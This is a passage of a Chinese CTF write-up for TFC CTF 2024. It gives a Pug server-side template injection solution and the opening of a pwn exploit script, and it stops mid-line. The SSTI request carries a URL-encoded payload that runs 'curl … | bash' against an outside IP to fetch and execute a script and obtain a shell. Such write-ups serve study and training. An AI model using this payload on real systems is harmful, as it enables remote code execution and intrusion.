点击蓝字
关注我们
声明
本文作者:CTF战队
本文字数:16263字
阅读时长:约40分钟
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
❝
https://ctf.thefewchosen.com/challenges
This year, The Few Chosen are thrilled to host our fourth annual Capture The Flag (CTF) event, set to take place from August 2nd to 4th, 2024.
We, a committed team of cyber enthusiasts who’ve cut our teeth on countless CTFs, are channelling our passion for cybersecurity into curating this unique, immersive CTF experience. We’ve meticulously engineered the event’s website from scratch, ensuring a seamless and enriching user experience. Our diverse set of challenges spans Pwn, Reverse, Web, Crypto, and Misc, each graded from “Warmup” to “Hard”.
This deliberate spectrum of difficulty ensures our CTF event is universally accessible – from cybersecurity novices eager to learn the ropes, to seasoned experts looking to flex their skills in a challenging environment. Mark your calendars for a uniquely immersive cybersecurity adventure. The Few Chosen CTF 2024: The perfect platform for honing skills, fueling passions, and embracing the cybersecurity community.
Sponsors:
Offensive Security
HackTheBox
Binary NinjaInfra sponsored by goo.gle/ctfsponsorship
WEB
GREETINGS
❝
Welcome to our ctf! Hope you enjoy it! Have fun 欢迎来到我们的ctf!希望你喜欢它!玩得开心
pug 的 SSTI
GET /result?username=%23%7b%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%6f%63%61%6c%4c%6f%61%64%3d%67%6c%6f%62%61%6c%2e%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%5f%6c%6f%61%64%3b%73%68%3d%6c%6f%63%61%6c%4c%6f%61%64%28%22%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%22%29%2e%65%78%65%63%28%27%63%75%72%6c%20%34%33%2e%31%33%35%2e%31%34%32%2e%37%37%3a%37%30%30%31%2f%72%2e%74%78%74%7c%62%61%73%68%27%29%7d%28%29%7d HTTP/1.1
Host: challs.tfcctf.com:32230
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://challs.tfcctf.com:32230/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
用了海外的服务器接收shell,国内的接收不到
参考:https://github.com/TheWation/NodeJsSSTI
Pwn
GUARD-THE-BYPASS
❝
Guard this cookie.
Note: If you successfully create a working exploit in the provided Docker, ensure you try the exploit multiple times on the remote system if any issues arise.
保护好这个饼干。
注意:如果您在提供的 Docker 中成功创建了一个有效的漏洞利用程序,请确保在出现任何问题时在远程系统上多次尝试利用该漏洞利用程序。
是个多线程程序,溢出覆盖栈上高地址位的canary绕过canary,然后ret2libc,直接用ogg打
from pwn import *
from pwncli import *
s = lambda data :io.send(data)
sa = lambda tag,data :io.sendafter(tag, data)
sl = lambda data :io.sendline(data)
sla = lambda tag,data :io.sendlineafter(tag, data)
r = lambda num=4096 :io.recv(num)
ru = lambda tag, drop=True :io.recvuntil(tag, drop)
p = lambda s: print(' 33[1;31;40m%s --> 0x%x